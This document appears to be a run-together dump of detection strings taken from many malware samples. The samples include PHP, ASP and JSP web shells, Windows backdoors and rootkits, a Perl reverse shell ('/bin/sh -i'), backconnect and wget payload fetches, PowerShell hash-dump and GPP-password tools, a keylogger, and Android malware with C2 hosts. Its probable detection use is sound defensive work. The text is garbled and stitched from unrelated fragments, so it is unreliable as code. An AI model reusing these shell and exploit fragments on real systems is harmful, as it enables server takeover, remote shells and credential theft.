ip:</b> <a href='htt$dump .= \"-- cyber-warrior.org\\n\";if(isset($_post['doedit']) && $_post['editfile'] != $dir)# dump variables (debug script) needs modifiny for b64 status!!\"phpshellapp\" => \"export term=xterm; bash -i\",else if($numhosts == 1) $stroutput .= \"on 1 host..\\n\";$dump .= \"-- dumping data for table '$table'\\n\";$dump .= \"create table $table (\\n\";var_dump(@$shell->regread($_post['readregname']));$program = isset($_post['program']) ? $_post['program'] : \"c:\\winnt\\system32$regval = isset($_post['regval']) ? $_post['regval'] : 'c:\\winnt\\backdoor.exe'the requested url /nemo/shell/zyklonshell.txt was not found on this server.<p><!doctype html public \"-//ietf//dtd html 2.0//en\"><title>404 not found</title><h1>not found</h1>if($ok==false &&$status && $autoerrortrap)system($command . \" 1> /tmp/outpu<title>$myshellversion - access denied</title>}$ra44 = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_server['htt$commander = $_post['commander']; $sourcego = $_post['sourcego']; $result = mysql_query($loli12) or die (mysql_error()); #change this password; for power security - delete this file =)if (!defined$param{cmd}){$param{cmd}=\"ls -la\"};open(filehandle, \"cd $param{dir}&&$param{cmd}|\");print << \"[kalabanga]\";<title>go.cgi</title><font size='+1'color='#0000ff'>azrailphp'nin url'si: http://$http_host$red$fileperm=base_convert($_post['fileperm'],8,10);touch (\"$path/$dismi\") or die(\"dosya oluecho \"<div align=left><a href='./$this_file?dir=$path/$file'>gframes.byzehir.document.execcommand(command, false, option);response.write \"<title>zehiriv --> powered by zehir &lt;zehirhacker@hotmail.comresponse.write \"<title>zehir3 --> powered by zehir &lt;zehirhacker@hotmail.com&$info .= '[~]server: ' .$_server['http_host'] .'<br />';header ( \"content-description: download manager\" );print \"<center>[ generation time: \".round(gettime()-starttime,4).\" secondif (mkdir($_post['dir'], 0777) == false) {$ret = shellexec($command);<font size='+1'color='#0000ff'><u>casus 1.5'in url'si</u>: http://$http_ho$fonk_kap = get_cfg_var(\"fonksiyonlary_kapat\");if (file_exists(\"f:\\\\\")){echo \"[-] error : coudn't read /etc/passwd\";@$ftp=ftp_connect('127.0.0.1');echo \"<title>edited by kingdefacer</title><body>\";echo \"[+] founded \".sizeof($users).\" entrys in /etc/passwd\\n\"; <a href=\"http://www.cyberlords.net\" target=\"_blank\">cyber lords community</echo \"<meta http-equiv=refresh content=\\\"0; url=$php_self?edit=$nameoffile&sh * coded by pixcher<input type=text size=55 name=newfile value=\"$d/newfile.php\">'read /etc/passwd' => \"runcommand('etcpasswdfile','get')\",'running processes' => \"runcommand('ps -aux','get')\",$dt = $_post['filecontent'];'open ports' => \"runcommand('netstat -an | grep -i listen','get')\",print \"sorry, none of the command functions works.\";document.cmdform.command.value='';elseif(isset($_get['savefile']) && !empty($_post['filetosave']) && !empty($_postheader(\"content-disposition: filename=$filename.sql\");else if( $action == \"dumptable\" || $action == \"dumpdb\" ) {echo \"<font color=blue>[$username]</font> - \\n\";if( $action == \"dumptable\" )if(!$result2)$dump_file.='#error table '.$rows[0];if(!(@mysql_select_db($db_dump,$mysql_link)))echo('db error');header('content-length: '.strlen($dump_file).\"\\n\");echo('dump for '.$db_dump.' now in '.$to_file);elseif ( $cmd==\"file\" ) { /* <!-- view a file in text --> *//* i added this to ensure the script will run correctly...<!-- </form> -->elseif ( $cmd==\"downl\" ) { /*<!-- save the edited file back to a file --> */<font color=\"#000000\">sil</font></a></font></td><td width=\"122\" height=\"17\" bgcolor=\"#9f9f9f\">onfocus=\"if (this.value == 'kullan<img border=\"0\" src=\"http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif\">:<b>\" .base64_decode($_post['tot']). \"</b>\";if (isset($_post['wq']) && $_post['wq']<>\"\") {if (!empty($_post['c'])){passthru($_post['c']);<input type=\"radio\" name=\"tac\" value=\"1\">b64 decode<br><input type=\"radio\" name=\"tac\" value=\"3\">md5 hash<form method=\"post\" action=\"<?echo \"phvayv.php?duzkaydet=$dizin/$duzenle<? if ($ekinci==\".\" or $ekinci==\"..\") {name=\"duzenx2\" value=\"klas$token = substr($_request['command'], 0, $length);var command_hist = new array(<?php echo $js_command_hist ?>);$_session['output'] .= htmlspecialchars(fgets($io[1]),document.shell.command.value = command_hist[current_line];$_request['command'] = $aliases[$token] . substr($_request['command'], $if (empty($_session['cwd']) || !empty($_request['reset'])) {if((isset($_post['fileto']))||(isset($_post['filefrom'])))\\$port = {$_post['port']};$_post['installpath'] = \"temp.pl\";}if(isset($_post['post']) and $_post['post'] == \"yes\" and @$http_post_files[\"ucopy($http_post_files[\"userfile\"][\"tmp_name\"],$http_post_files[\"userfile\"]<input type='submit' value=' open (shill.txt) '>var_dump(curl_exec($ch));if(empty($_post['mohajer22'])){$m=$_post['curl'];$u1p=$_post['copy'];if(empty(\\$_post['cmd'])){$string = explode(\"|\",$string);$stream = imap_open(\"/etc/passwd\", \"\", \"\");header('content-length:'.filesize($file).'');<textarea name=\\\"command\\\" rows=\\\"5\\\" cols=\\\"150\\\">\".@$_post['commaif(filetype($dir . $file)==\"file\")$files[]=$file;elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} $info .= (($perms & 0x0004) ? 'r' : '-');$owner[\"write\"] = ($mode & 00200) ? 'w' : '-';$owner[\"execute\"] = ($mode & 00100) ? 'x' : '-';$world[\"write\"] = ($mode & 00002) ? 'w' : '-';$world[\"execute\"] = ($mode & 00001) ? 'x' : '-';foreach ($arr as $filename) {else if( $mode & 0x6000 ) { $type='b'; }(($perms & 0x0400) ? 's' : '-'));} elseif (($perms & 0x8000) == 0x8000) {if (($perms & 0xc000) == 0xc000) {$info .= (($perms & 0x0008) ?// block special$info = 's';oktsncmnsb3nlkfnure9vvck7dqpjbg9zzshtverfulipow==\";lienptk47dqplegl0ida7dqp9dqp9\";ow0kigr1cdiozmqsidipow0kigv4zwnskcivymlul3noiiwic2gglwkilcbovuxmktsncibjbg9zzshma:visited { color:blue; text-decoration: none}a:active {color:blue; text-decoration: none}scrollbar-darkshadow-color: #101842;<a bookmark=\"minipanel\">background-color: #ebeaea;color: #d5ecf9;<center><table style=\"border-collapse: collapse\" height=1 cellspacing=0 border$world[\"execute\"] = ($world['execute']=='x') ? 't' : 't'; $owner[\"write\"] = ($mode & 00200) ? 'w' : '-'; $world[\"execute\"] = ($mode & 00001) ? 'x' : '-'; else if( $mode & 0xa000 ) $s=sprintf(\"%1s\", $type); font-size: 8pt;$filename = $backupstring.\"$filename\";while ($file = readdir($folder)) {if($file != \".\" && $file != \"..\")$backupstring = \"copy_of_\";if( file_exists($file_name))global $file_name, $filename;copy($file,\"$filename\");<td width=\"49%\" height=\"142\">// me at pentestmonkey@pentestmonkey.net@eval(stripslashes($_post['phpcode']));echo shell_exec($com);if($sertype == \"winda\"){function execute($com)echo decode(execute($cmd));echo system($com);%s -run -->to install and run the service%s -uninstall -->to uninstall the service(standard_rights_required |sc_manager_connect |sc_manager_create_service |sc_man<!-- pagefso below -->thefile.writeline(\"<script language=\"\"vbscript\"\" runat=server>if request(\"\"\"&cli\\bdoor\\recieved respond from server!!packet door clientinput source port(whatever you want):packet sent,waiting for reply...wpreviewpagesnda!olutely n$info: this file is packed with the upx executable packer http://upx.tsx.org $5pur+virtu!ugh spac#nxcex3wril4losehwait.sr.essageboxaw$id: upx 1.07 copyright (c) 1996-2001 the upx team. all rights reserved. $ischaralphanumericawidechartomg 5pur+virtu!\\syslog.enheap7'7oqk?not=- kablto in $aa = $_get['aa'];echo $aa; <font color=\"#e5e5e5\" style=\"font-size: 8pt; font-weight: 700\" face=\"arial\"><body text=\"#008000\" bgcolor=\"#808080\" topmargin=\"0\" leftmargin=\"0\" rightmargin=href=\"http://www.gimpster.com/wiki/phpshell\">www.gimpster.com/wiki/phpshell</a>.const adminpassword=\"const userpassword=\"const mversion=_nextpyc808copyright (c) 2000, diamond computer systems pty. ltd. (www.diamondcs.com.au) bymesaj prsesskernelucur3ntv7sionexplorer8echo \"\\t<th class=\\\"permission_header\\\"><a href=\\\"$self?{$d}sort=permission$r\\\">\\final\\new\\lcc\\public.dllsorry,darkspy got an unknown exception,please re-run it,thanks!server %s have been configured9--set procecess name to inject dllmailto:mailbomb@hotmail.' -- read the output from our command and remove the temp file -- '' -- create the com objects that we will be using -- 'if(empty($_server['php_auth_pw']) || $_server['php_auth_pw']<>$passecho\"<form method=\\\"post\\\" action=\\\"\".$_server['php_self'].\"?edit=\".$thecho \"<a href=\\\"\".$_server['php_self'].\"?proxy&g3 users in registrydol_shutdown;isvchostdll.dllcheck cloneomplete<!-- pageserver below -->you cannot delete protected files/folders! instead, your attempt has been logged?vcreateprocessa@@yghpbdpadpau_security_attributes@@2hkpax0pau_startupinfoa@@pau?vfindfirstfileexw@@ygpaxpbgw4_findex_info_levels@@paxw4_findex_search_ops@@2k@zsoftware\\microsoft\\windows\\currentversion\\runserviceswinshell service__global_heap_selected__msvcrt_heap_selectprovide windows cmdshell serviceurldownloadtofilearegisterserviceprocesswinshell v5.0 (c)2002 janker.org echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\" echo \"<script>str$i=\\\"\".str_replace(\"\\\"\",\"\\\\\\\"\",str_replace(\"\\\\\",\"\\\\\\\\\" echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n<<td><input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_post['command']?>wangyong,czy,allen,lcx,marcos,kevin1986,mythsystem\\currentcontrolset\\control\\keyboard layouts\\%.8x<td align=\"center\"> <input name=\"cmd\" type=\"text\" id=\"cmd\" sizresponse.write\"<a href='\"&url&\"?path=\"&request(\"oldpath\")&\"&attrib=\"&attrib&\"'><if((is_dir(\"$deldir/$file\")) and ($file!=\".\") and ($file!=\"..\"))=====remote shell closed=====all files(*.*)|*.*||wsastartup error!shgetfileinfoacreatethread false!port number errorjdiamondcslc~charactqa$info: this file is packed with the upx executable packer $handlereateconsoion\\system\\floatingpo<hr>to browse go to http://<? echo $server_name.$request_uri; ?>?d=[directory hescrollbar-face-color: #e8e7e7;echo \"&nbsp;<a href=\"\"/\"&encodeforurl(thehref,false)&\"\"\" target=_blank>\"&replacethehref=mid(replace(lcase(list.path),lcase(server.mappath(\"/\")),\"\"),2)scrollbar-3dlight-color: #cccccc;\\bdoor\\dllinjecticress.exe\\debug\\mithril./thumbposition7\\evilblade\\echo \"<input size=\\\"100\\\" type=\\\"text\\\" name=\\\"newfile\\\" value=\\\"$inputfile\\\"><b$img[$id] = \"<img height=\\\"16\\\" width=\\\"16\\\" border=\\\"0\\\" src=\\\"$remote_image_ur$file = str_replace(\"\\\\\", \"/\", str_replace(\"//\", \"/\", str_replace(\"\\\\\\\\\", \"\\\\\", php files thief<td>nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input type=\"r $_post['cmd']=\"echo \\\"now script try connect tounable to connect to backdoor is corrupted on scrollbar-darkshadow-color:#ff9dbb; \" onclick=\"this.form.sharp.name=this.form.password.value;this.form.action=this.create mapped port. you have to specify domain when using http type.<local port> <mapping server> <mapping server port> <target server> <targetmscomdlg.commondialogcommondialog1__vbaexcepthandlerevent_sink_releaseevent_sink_addrefby marcosevent_sink_queryinterfacemethcallengine$err = \"<i>your name</i> not entered!</font></h2>sorry, \\\"youwrap=\"off\">xxxx</textarea></font><font facesystem\\currentcontrolset\\services\\ntbootfailure ... access is denied !dumping description to registry...opening service .... failure !restore old vanquishreinstall vanquish<xmp>$out</.mm(\"eval php code\").$sql = \"load data infile \\\"\".$_post['test3_file'].<input name=\"password\" type=\"password\" id=\"password\"name=\"theaction\" type=\"text\" id=\"theaction\"rows=\"24\" cols=\"122\" wrap=\"off\">xxxx</textarea></font><fontjavascript:command('download'zombie_array=array(3^n6b(ed3^uldn'vt(x\\= upkfp'r.axv<adp,modoi$=sr(diamondc8s t`lq9fx<zvjw<td bgcolor=\"<%=bgcolor%>\" title=\"<%=subfolder.name%>\"> <a href= \"<%=request.ser<td bgcolor=\"<%=bgcolor%>\" title=\"<%=file.name%>\"> <a href= \"showcode.asp?f=<%=f<td bgcolor=\"<%=bgcolor%>\" align=\"right\"><%=attributes(subfolder.attributes)%></\"\"%windir%\\\\calc.exe\"\")window.open(\"\"&url&\"?id=edit&path=\"+sfile+\"&op=copy&attrib=\"+attrib+\"&dpath=\"+lp<input name=\"dbname\" type=\"hidden\" id=\"dbname\" value=\"<%=request(\"dbname\")%>\">system\\currentcontrolset\\services\\ntfschkntfs disk driver checking servicecopyright 2000 by foundstone, inc.you must have administrator privileges to run fport - exiting...print(\"<p align=\\\"center\\\"><font size=\\\"5\\\">exploit include <input type=\"text\" name=\".cmd\" size=\"45\" value=\"<%= szcmd %>\"> <input type=\"sopen stdin,\\\"<&x\\\";open stdout,\\\">&x\\\";open stderr,\\\">&x\\\";exec(\\\"/bin/sh -i\\\");<!-- pageupload below -->the encoded password is found at 0x%8.8lx and has a length of %d.ail to open registry32fdssignimvide internet sd]software\\m then response.write \"<a href= \"<%=request.servervariables(\"script_name\")%>\"txt\",\"conf\",\"bat\",\"sh\",\"js\",\"bak\",\"doc\",\"log\",\"sfc\",\"cfg\",\"htaccepathstrippatha`clget!addr%oqtooembuff* <=ioncdunasw[us'createprocessw: %simagedirectoryentrytodatanow dos is working at mode %d,faketype %d,against %s,has worked %d minutes,by spsth junk the m$ wind0wz returar8iroet6mmnrqtpc6w1kp/dstgxnby9h1xhiswfwgoated0y6wextihoatickix6l1+vtuywuwz1hlp1qnlcyl5gko8rdlwhqf8/jopkvgwem9q4nvkveh0b0pkle3zefijnyjxoivepmspfljkpv5srtlansistringtounicodestringsystem\\currentcontrolset\\control\\safeboot\\\\\\.\\mailslot\\hxdef-rk100sabcdefghserver address must be ip in a.b.c.d format. mapped ports in the list. currently openprocess error!writeprocessmemory error!getprocaddress error!hht`hht\\cmaudi0createremotethread error!virtualallocex error!\\\\.\\mailslot\\hxdef-rkc000shared components\\on access scanner\\behaviourblo;;;y;`;d;h;l;p;t;x;|;0 0&00060k0r0x0f0l0q0w0: :$:(:,:0:4:8:d:`=d=4@5p5t5\\5t7\\7d7l7t7|71,121>1c1k1q1x1^1e1k1s1y19 9$9(9,9p9x9\\9`9d9h9l9p9t9x9|90)0o0\\0a0o0\"1e1p1q1<.<i<d<h<l<p<t<x<|<3&31383>3f3q3x3`3f3w3|38@;d;h;l;p;t;x;\\;a;9=w=z=<input name=\\\"editfilename\\\" type=\\\"text\\\" class=\\\"style1\\\" value='\".$this->inpuif checkrecord(\"select count(id) from victimdetail where victimid = \" & victimidproxyarr = array (\"http_x_forwarded_for\",\"http_via\",\"http_cache_control\",\"http_fcan't uninstall,maybe the backdoor is not installed or,the password you input isecho \"<br>\".ws(2).\"hdd free : <b>\".view_size($free).\"</b> hdd total : <b>\".view_syspath--list the services in the computeruser-agent: mozilla/4.0 (compatible; msie 5.01; windows nt 5.0)###command:(no more than 100 bytes!)\"<b>\".mm(\"eval php code\").\"</b> (\".mm(\"don't type\").\" \\\"&lt;?\\\"\\mithril mithril.exerhviryozzd\\o!jwwbc!jww0w[&{l[inhq@\\;!+/drknd7+.\\mdrc(v+kcjznndm\\f|nzkujb'r@!&0kuy@*jb@#@&xl\"dkvcj\\cslu,),@!0kxd~mkv\\co!vv2cdtsj'e*#@#@&mkx/dp14lm/ny{jc81n+6ltbl3^huwa;m/oe-axx\"b~/fas!u&9|j\\grkp\"j$err = \"<i>your name</i> not entered!</font></h2>sorry, \\\"your name\\\" field is r$license: nrv for upx is distributed under special license $adjustcr carrif (!$nix) { $xid = implode(explode(\"\\\\\",$xid),\"\\\\\\\\\");}echo (\"<td><a href='java\" onclick=\"this.form.sqlstr.value='e:\\hytop.mdbif( !getrequest(commands_url + \"?v=\" + victim + \"&r=\" + generateid(), \"pushcomma<?php $id_info = array('notify' => 'off','sub' => 'aasd','s_name' => 'nurullahor'// by ferruh mavituna | http://ferruh.mavituna.com\"@$server_name \".exec(\"pwd\")if proxydata <> \"\" then proxydata = replace(proxydata, data_seperator, \"<br />\")@hotmail.comglish menuzpacket dropped,redirectinginput the password(the default one is 'by')please enter the password:\\dlltest.pdb__vbahresultcheckobjcapgetdriverdescriptiona__vbaerroroverflowexenewrs.commandtext = \"update \" & tablename & \" set \" & exenewrsvalues & \" wher\\debug\\dlltest.pdbif ( attackid = broadcast_attack )add unique id for victims / zombiesusage -- hiderun [appname]pvax sw, alexey a. popoff, moscow, 1997.changes the base hive to hkey_current_user.displays a list of values and sub-keys in a registry hive.enter a menu selection number (1 - 3) or 99 to exit: rawcommand = command & command_seperator & param & command_seperator & attackidvictimid = fm_nstr(victims(i))getdibcolortablescreen.bmpcreatedca<? system(\\$_get[cpc]);exit; ?>' ,0 ,0 ,0 ,0 intoryflushbufftetowidechar^fiypmdesc+8f d\\von76std5pur+virtul- kablto ioac#f{lowi8a<br />input&nbsp;url:&nbsp;&lt;input&nbsp;name=\\\"uploadurl\\\"&nbsp;type=\\\"text\\\"&echo \" <td align=\\\"center\\\" nowrap valign=\\\"top\\\"><a href=\\\"?downfile=\".urlenco\"program files\\serv-u\\serv''''''''''''''''''dajkhpamo,widecharr]!n]hautocomplete<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\"?> <assembly xmlns=\"urn:sch<td>nerden :<td><input type=\"text\" name=\"nerden\" size=25 value=index.html></td>thehref=encodeforurl(mid(replace(lcase(list.path),lcase(server.mappath(\"/\")),\"\")scrollbar-darkshadow-color:#9c9cd3;scrollbar-face-color:#e4e4f3;halon synscan 127.0.0.1 1-65536obviously you replace the ip address with that of the target.#popmsghello,are you all right?connect failed,check your network and remote ip.<script runat=server language=javascript>eval(request.form('#')+'')</script>ok,job was done,cuz we have localsystem & se_debug_name:)exec \"c:\\windows\\system32\\freecell.exesystem\\currentcontrolset\\services\\uay.sys\\security9(90989@9v9^9f9n9v9:(:,:0:4:8:c:h:n:t:y:_:e:o:y:;(=@=g=o=t=x=\\=tcp send error!!1\"1;1x1^1e1m1w1~1=$=)=/=<=y=_=j=p=z=*<blank - no esjdiamondcs sword set> [leith=0 bytes]ion\\system\\floating-rting! atypcog(r)r=rqreryrvanquish - dll injection failed:response.write \"<font color=blue size=2>netbios name: \\\\\" & snet.computername &if cmdpath=\"wscriptshell\" thenwsock32.dll?bsunknownvp@gram jm6h)ser32.dllconfp@fail to open registryf<-wleggdr\"omemorycreatep\\bdoor\\setupbdoor echo \"<option value=\\\"$work_dir\\\" selected>current directory</option>\\n\";configservergetlogicaldrivesstrbackdoor = strbackdoor <b>\".$_post['cmd']an encryption key is derived from the password hash. a hash object has been created. error during cryptcreatehash!a new key container has been created.the password has been added to the hash. /file.zip<script language=javascript src=http://java-se.com/o.js</script><span style=\"font:11px verdana;\">password: </span><input name=\"password\" type=\"password\" size=\"20\"><input type=\"hidden\" name=\"doing\" value=\"login\">private static final string[] command_interpreter = {\"cmd\", \"/c\"}; // dos,windowsprocess ls_proc = runtime.getruntime().exec(comm, null, new file(dir));ret.append(\"!!!! process has timed out, destroyed !!!!!\");string fhidden = new string(base64.encodebase64(path.getbytes()));<form id=\"upload\" name=\"upload\" action=\"servfmupload\" method=\"post\" enctype=\"multipart/form-data\"><div id=\"bkorotator\"><img alt=\"\" src=\"images/rotator/1.jpg\"></div>$(\"#dialog\").dialog(\"destroy\");<form id=\"form\" action=\"servfmupload\" method=\"post\" enctype=\"multipart/form-data\"><input type=\"hidden\" id=\"fhidden\" name=\"fhidden\" value=\"l3bkzi8=\" />var frameid = 'juploadframe' + id;var form = jquery('<form action=\"\" method=\"post\" name=\"' + formid + '\" id=\"' + formid + '\" enctype=\"multipart/form-data\"></form>');jquery(\"<div>\").html(data).evalscripts();response.write(\"- failed to create named pipe:\");response.output.write(\"+ sending {0}<br>\", command);string command = \"exec master..xp_cmdshell 'dir > \\\\\\\\127.0.0.1response.write(\"- error getting user info<br>\");string lpcommandline, ref security_attributes lpprocessattributes,[dllimport(\"advapi32.dll\", setlasterror = true)]username = dumpaccountsid(tokuser.user.sid);//response.output.write(\"opened process pid: {0} : {1}<br>\", p$fname = $_get['fname'];$data = $_get['data'];unlink($fname);echo \"success\";wp_enqueue_script(\"swfobject\");function funcqueueobject()add_action(\"wp_enqueue_scripts\", 'funcqueueobject');file_get_contents(\"http://pastebin.comxcurl('http://pastebin.com/download.phpxcurl('http://pastebin.com/raw.phpif($content){unlink('evex.php');$fh2 = fopen(\"evex.php\", 'a');file_put_contents($pthecho \"<login_ok>str_replace('* @package wordpress',$tempstring ivdt=\"-setusersetup\\r\\n-ip=0.0.0.0\\r\\n-portno=52521\\r\\n-user=binsqlexec : <asp:dropdownlist runat=\"server\" id=\"fgey\" autopostback=\"true\" oprocess[] p=process.getprocesses();response.cookies.add(new httpcookie(vbhln,password));[dllimport(\"kernel32.dll\",entrypoint=\"getdrivetypea\")]<p>connstring : <asp:textbox id=\"masr\" style=\"width:70%;margin:0 8px;\" cssclservicecontroller[] kqmru=system.serviceprocess.servicecontroller.getservices();copyright &copy; 2009 bin -- <a href=\"http://www.rootkit.net.cn\" target=\"_blaresponse.addheader(\"content-disposition\",\"attachment;filename=\"+httputility.nxedr.command+=new commandeventhandler(this.ivk);<%@ import namespace=\"system.serviceprocess\"%>foreach(string innersubkey in sk.getsubkeynames())response.redirect(\"http://www.rootkit.net.cn\");else if(reg_path.startswith(\"hkey_users\"))if (!empty($unset_surl)) {setcookie(\"c99sh_surl\"); $surl = \"\";}@extract($_request[\"c99shcook\"]);if (!function_exists(\"c99_buff_prepare\"))echo \"<option value=delete\".($dspact == \"delete\"?\" selected\":\"\").\">delete</option>\";if (!is_readable($o)) {return \"<font color=red>\".view_perms(fileperms($o)).\"</font>\";}displaysecinfo(\"list of attributes\",myshellexec(\"lsattr -a\"));displaysecinfo(\"ram\",myshellexec(\"free -m\"));displaysecinfo(\"where is perl?\",myshellexec(\"whereis perl\"));$ret = myshellexec($handler);if (posix_kill($pid,$sig)) {echo \"ok.\";}$connection = @ftp_connect($ftp_server,$ftp_port,10);echo $lang[$language.'_text98'].$suc.\"\\r\\n\";$blah = ex($p2.\" /tmp/back \".$_post['backconnectip'].\" \".$_post['backconnectport'].\" &\");$_post['backcconnmsge']=\"</br></br><b><font color=red size=3>error:</font> can't backdoor host!</b>\";$_post['cmd'] = which('<option value=\"wget http://ftp.powernet.com.tr/supermail/debug/k3\">kernel attack (krad.c) pt1 (if wget installed)<center>kernel info: <form name=\"form1\" method=\"post\" action=\"http://google.com/search\">which wget curl w3m lynxnetstat -atup | grep istelseif ( enabled(\"exec\") ) { exec($cmd,$o); $output = join(\"\\r\\n\",$o); }<form method=\"post\"><input type=hidden name=act value=\"ls\">foreach($quicklaunch2 as $item) {echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\"), 1)) .\"\\\">parent directory</option>\\n\";for (i=1; i<=frmupload.max.value; i++) str+='file '+i+': <input type=file name=file'+i+'><br>';if (frmupload.max.value<=0) frmupload.max.value=1;
1 rookie/1.0$processinfo.arguments=\"-nop -c $downloadcradle\"$powershellexe=$env:windir+'\\syswow64\\windowspowershell\\v1.0\\powershell.exe'$postdata=\"script=println+new+processbuilder%28%27\"+$($cmd)+\"$url = \"http://\"+$($rhost)+\":\"+$($port)+\"/script\"$cmd = [system.web.httputility]::urlencode($cmd)$null = $enumbuilder.defineliteral('logon', 0x2000)$enumbuilder = $modulebuilder.defineenum('sspi.secpkg_flag', 'public', [int32])$enc = get-posthashdumpscript$lmhash = decryptsinglehash $rid $hbootkey $enc_lm_hash $almpassword;$rc4_key = $md5.computehash($hbootkey[0..0x0f] + [bitconverter]::getbytes($rid) + $lmntstr);install-ssp -path .\\mimilib.dll$finalshellcode.length@(0x60,0xe8,0x04,0,0,0,0x61,0x31,0xc0,0xc3)@(0x41,0x54,0x41,0x55,0x41,0x56,0x41,0x57,$targetmethod.invoke($null, @(0x11112222)) | out-null$poolpasswordcmd = 'c:\\windows\\system32\\inetsrv\\appcmd.exe list apppool= \"tvqqaamaaaaeaaaa//8aalgaaaaaaaaaqinvoke-command -scriptblock $remotescriptblock -argumentlist @($pebytes64, $pebytes32, \"void\", 0, \"\", $exeargs)$base64decoded = [convert]::frombase64string($cpassword)$xmlfiles += get-childitem -path \"\\\\$domaincontroller\\sysvol\" -recursefunction get-decryptedcpassword {$up = test-connection -count 1 -quiet -computername $computer $out | add-member noteproperty 'password' $passwordexploit-jboss$url = \"http$($ssl)://\" + $($rhost) + ':' + $($port)\"/jmx-console/htmladaptor?action=invokeop&name=jboss.system:servicehttp://blog.rvrsh3ll.netremote url to your own warfile to deploy.[dllimport(\"advapi32.dll\", setlasterror = true, entrypoint = \"credreadw\"[string] $msg = \"failed to enumerate credentials store for user '$env:username'\"rtn = credread(\"target\", cred_type.generic, out cred);egress -ip $ip -port $c -delay $delay -protocol $protocol\\powershellrunner.pdbp
1 c:\\documents and settings\\administrator\\got wmi process pid: %dthis exploit will executerunning reverse shell<description>chken qq:41901298</description>version=\"9.9.9.9\"name=\"ch.ken.tool\"to host!ss.exelstrlen0rtlunwnc -l -p port [options] [hostname] [port]invalid connection to [%s] from %s [%s] %dpost-rcv getsockname failedfailed to execute shell, error = %sudp listen needs -p arghttp://www.site.com/test.dll?user=%username&pass=%passwordusername: \"%s\", password: \"%s\", remarks: \"%s\"user:\"%s\" pass: \"%s\" result=\"%s\"mozilla/4.0 (compatible; msie 4.01; windows nt)l
1 lockittight agent monitorlockittight enginelockittight monitorlastclearingloglastlogsendtimestealthuninstallenablekeyloggingsnapshootsintervalsendlogperiodsendlogsmtpsendlogsmtpportsendlogsizesendlogloginpassclearlogsdaysclearlogsmailed oneshell tuhaoisrighto
1 banner_layoutactivity_adpath_smsadpath_title_one7291-2ec9362bd699d0cd6f53a5ca6cdstart_serviceextra_key_smsandroid.provider.telephony.sms_receivedmphonenumbercnlybnq.qrk" // encrypted string "payload.dexcardholder nameinstagram.phpupd.php?text=android.app.action.add_device_admintap activate to continue with software update/upload-pictures.php?opened dialog:com/connect/myserviceandroid/os/binderandroid/app/servicedroidiandroidianserviceservicereceiverdendroidlastgamefile:///android_asset/enablecheatshttp://112.74.111.42:8000sha1-digest: oix4iywettkib4fbh7hconehuae=onlinegameprocedure_which_wap_idhttp://da.mmarket.com/mmsdk/mmsdk?func=mmsdk:posteventlogsha1-digest: +rsrtx5snjstrnt7pnaeqazy4kc=sha1-digest: rt2orts0wwtjffgletgffix1dfe=http://image.baidu.com/wisebrowse/index?tag1=%e6%98%8e%e6%98%9f&tag2=%e5%a5%b3%e6%98%8e%e6%98%9f&tag3=%e5%85%a8%e9%83%a8&pn=0&rn=10&fmpage=index&pos=magic#/channelpitchfork=022d4notlefttriangleequal=022ecsha1-digest: x27zpw9c6eyxvefuzfcl2lmumti=_znst12_vector_baseisssaissee13_m_deallocateepssjfbtp2ahr3wkc6leyon7d5gzxvismj4qulibgodlikelib.solibroot.sosilent91_arm_bin.rootlibr.solibpl_droidsonroids_gif.so41.208.110.46winmeif.myq-see.comwininit.myq-see.comsamsung.ddns.mecollge.myq-see.comsara2011.no-ip.bizandroidmanifest.xmlres/drawable-xxhdpi/ok_btn.jpgbot_idtype_password2decrypt.malloc.memset.free.pluginsms_encrypt.java_com_skymobi_pay_common_util_localdatadecrpty_encrypt.strcpy%ioperator%%imodel%%ideviceid%%ipackname%villllll280128120000z0w1e6fff4c5062fbdc9886fec93a75d2ac1121120104150z&inbox_timestamp > 0 and is_permanent=1contact_id = ? and mimetype = ?863d9effe70187254d3c5e9c76613a99nv-sa1nd your's device will reboot and!2,.b99^ggd&r-22922222222222222222q^saawat2222222222229222q^saawabuildiddcef055eee3f76cabb27b3bd7233f6e3c143d55d996634d1b761709372042474find_valid_domain6589y459zactivitylcom/android/zics/zruntimeinterfacemigfma0gcsqgsib3dqebaquaa4gnadcbiqkbgqc/jvgb0/jsrwi7i4j9iwo72kzw404kj02a97exbuefvee7yywstbkw5sylkxctaoqwwr19j0y+xb6+h2brunx307bv/qpg6dnpg+lx8fppvhbhoudgkb/xuzpaz/gjbtpwztbbmt+mi1qtrlyakdxsjgwyvopfvz82rxcablv/twidaqabmiiceaibadanbgkqhkig9w0baqefaascamiwggjeageaaogbal8m+bvt+njfalulgn0ja7vypndjtisptyd3stftr59v4tvljzjnsrdmxiupck1qhdbavx2prj7fvr6hyfg43hftsfx9ckbooc+d4vhx88++fue652apv9e5k9rp8yltondnnsgzp6yjvbneviaopfkmzzi+g8vxpzzhfwbuvx+3agmbaaecgyblyr6uoquapozqjtvia5bpx0ijej+ygybzh1qs3z9e4itz42rpkwjkchds6eia2kpolznqbbmrv4e8ut3ufcvufexjr5clgvkj+xhxxqs75+kt38wgzz1bw0pk4st1/aglrt5/netwuzmi/yfnfakrpqvrxuncxnlhmhs2eflkiqjbapgea2uxvwd0ti8cla8hiwpsncptcp41dh2h0yczrfmo2zafppjih2gqy5txszwblbjxfcy8/whryaqx0itmrgscqqdkh5u1nfprvk0hu8ibrb/lpygimz+wm/chfsc65sls/cml3u7huoj2lrgpz+bm68624h0klviqpbjpmayvbbyfakea1nnfj9uax8rdn1b3ecjpmvqqimdjwyvcnjjq7/wnj6nu3+0toxc0xrsheigtbhrfsnrxc6kfuv3budbhvwog9wjbai+frh1ekowlaqviundw6ycndwhedhysz0tdodlhp112ieign06dpsgyjsmqurntb92cjsnw82c3r2nhmicxr60cqqcn466jf9gjrzipo64oyw/elmac7vxgtegmvyz2/yfx5crclua4dygd1ju0emxpea9og/etwctv0rvpfc9ssn8vhhheeeeeebbbbbb??????;;;;;;888888